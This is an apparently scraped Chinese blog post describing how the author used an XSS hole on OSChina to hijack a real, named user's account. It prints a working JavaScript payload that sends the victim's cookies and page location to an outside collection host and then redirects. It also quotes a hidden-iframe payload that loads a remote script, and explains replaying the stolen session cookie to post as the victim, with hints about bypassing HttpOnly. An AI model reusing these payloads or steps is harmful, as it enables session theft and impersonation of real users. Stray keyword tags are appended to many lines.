首先,先道歉..让@铂金小猪 成为了受害用户...当了我儿子一天...如今@Soga @皮总 大家知道那天是怎么回事了吧。。javascript
其实今天要讲的是Xss(Cross Site Scripting)的一种利用方式:劫持用户帐号html
首先须要找到OSChina存在xss注入的地方。:)这里先隐藏。。等@红薯 修复。。。前端
而后再将带有XSS的url(我使用了google的短连接包装了一下)发给受害者@铂金小猪 。java
而后让oschina充满养猪广告的妹纸@铂金小猪 哭了:web
不信的话,你们如今还能够去看@铂金小猪 空间左侧的签名chrome
其实xss你们搜搜下就知道怎么利用了。。可是劫持帐户上。你们可能以为有两个难点..我在这里教你们。。cookie
1.若是收到被害者的cookie.网络
其实能够在本身网站上作一个脚原本进行cookie收集。。。也能够用第三方的cookie收集平台。。app
好比xsser.me或者xss.la等。这两个平台都是禁止注册的。。本身写一个就好.很简单xss
熟悉javascript,简单看下别人偷cookie的代码。。就明白是怎么回事了
var x=new Image(); try { var myopener=''; myopener=window.opener && window.opener.location ? window.opener.location : ''; } catch(err) { } x.src='http://xssapp.com/accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener); self.location="http://my.oschina.net/samshuai";
上面是个人xss javascript代码。。。
再发个别人的一个利用方式:
<iframe onload="this.src='xss 地址+<script src =tmxk.Org/0.js>'" style="display:none"></iframe>
2.得到cookie以后,如何使用?
其实firefox和chrome都有插件能够完成这个功能。直接替换上@铂金小猪 的oscid就能够用他的帐号说话了。。
我用的是firefox的web developer toolbar:
@红薯 兼职就是聪明绝顶啊。。。这两天他捣鼓了一个Java EE 6.0 的 Cookie 类已经有设置 HttpOnly 的方法。。
其实使用httponly也是一种防止cookie被盗和被修改的方法。。主要让document.cookie不起做用。这真的能防止cookie被盗么???我笑了。。。。。你们能够说下继续利用的方式。。看看和个人绕过httponly方法是否一致。个人方法里面包裹document.xxx你们想一想吧。。。
还有就是使用了httponly真的不能使用工具修改本身的cookie了么??也是有极其淫荡的方式的。。。你们也能够说说。
扩展阅读:
网络攻击技术(二)——Cross-site scripting